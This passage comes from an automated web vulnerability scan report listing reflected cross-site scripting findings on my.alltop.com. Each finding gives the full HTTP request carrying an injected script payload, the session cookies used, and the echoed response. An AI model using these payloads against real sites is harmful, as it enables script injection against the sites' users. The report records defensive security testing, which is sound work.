Content-Type: text/html; charset=utf-8
Content-Length: 22577

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/scripts/?4c1ab"><script>alert(1)</script>7e7dbe994c5=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.271. http://my.alltop.com/scripts/ [nsextt parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /scripts/

Issue detail

The value of the nsextt request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 743fd"><script>alert(1)</script>1ad3ed6a9c6 was submitted in the nsextt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /scripts/?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000005)%3C/script%3E743fd"><script>alert(1)</script>1ad3ed6a9c6 HTTP/1.1
Referer: http://my.alltop.com/scripts/sifr/sifr.js
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 403 Forbidden
Date: Tue, 08 Mar 2011 20:49:20 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:49:20 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:49:25 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:49:25 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22913

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/scripts/?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000005)%3C/script%3E743fd"><script>alert(1)</script>1ad3ed6a9c6" method="post" accept-charset="utf-8">
...[SNIP]...

1.272. http://my.alltop.com/scripts/sifr/ ['"--> parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /scripts/sifr/

Issue detail

The value of the '"--></style></script><script>netsparker(0x000079)</script> request parameter is copied into the HTML document as plain text between tags. The payload 7964f<script>alert(1)</script>753d83407a was submitted in the '"--></style></script><script>netsparker(0x000079)</script> parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /scripts/sifr/?'"--></style></script><script>netsparker(0x000079)</script>7964f<script>alert(1)</script>753d83407a HTTP/1.1
Referer: http://my.alltop.com/scripts/sifr/sifr.js
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 403 Forbidden
Date: Tue, 08 Mar 2011 20:49:13 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:49:13 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:49:13 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:49:13 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22813

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
</script>7964f<script>alert(1)</script>753d83407a" method="post" accept-charset="utf-8">
...[SNIP]...

1.273. http://my.alltop.com/scripts/sifr/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /scripts/sifr/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd634"><script>alert(1)</script>7c29af513a1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /scripts/sifr/?cd634"><script>alert(1)</script>7c29af513a1=1 HTTP/1.1
Referer: http://my.alltop.com/scripts/sifr/sifr.js
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 403 Forbidden
Date: Tue, 08 Mar 2011 20:48:07 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:48:07 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:48:09 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:48:09 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22597

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/scripts/sifr/?cd634"><script>alert(1)</script>7c29af513a1=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.274. http://my.alltop.com/scripts/sifr/ [nsextt parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /scripts/sifr/

Issue detail

The value of the nsextt request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58402"><script>alert(1)</script>cbdebb44164 was submitted in the nsextt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /scripts/sifr/?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000004)%3C/script%3E58402"><script>alert(1)</script>cbdebb44164 HTTP/1.1
Referer: http://my.alltop.com/scripts/sifr/sifr.js
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 403 Forbidden
Date: Tue, 08 Mar 2011 20:48:52 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:48:52 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:48:53 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:48:53 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22933

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/scripts/sifr/?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000004)%3C/script%3E58402"><script>alert(1)</script>cbdebb44164" method="post" accept-charset="utf-8">
...[SNIP]...
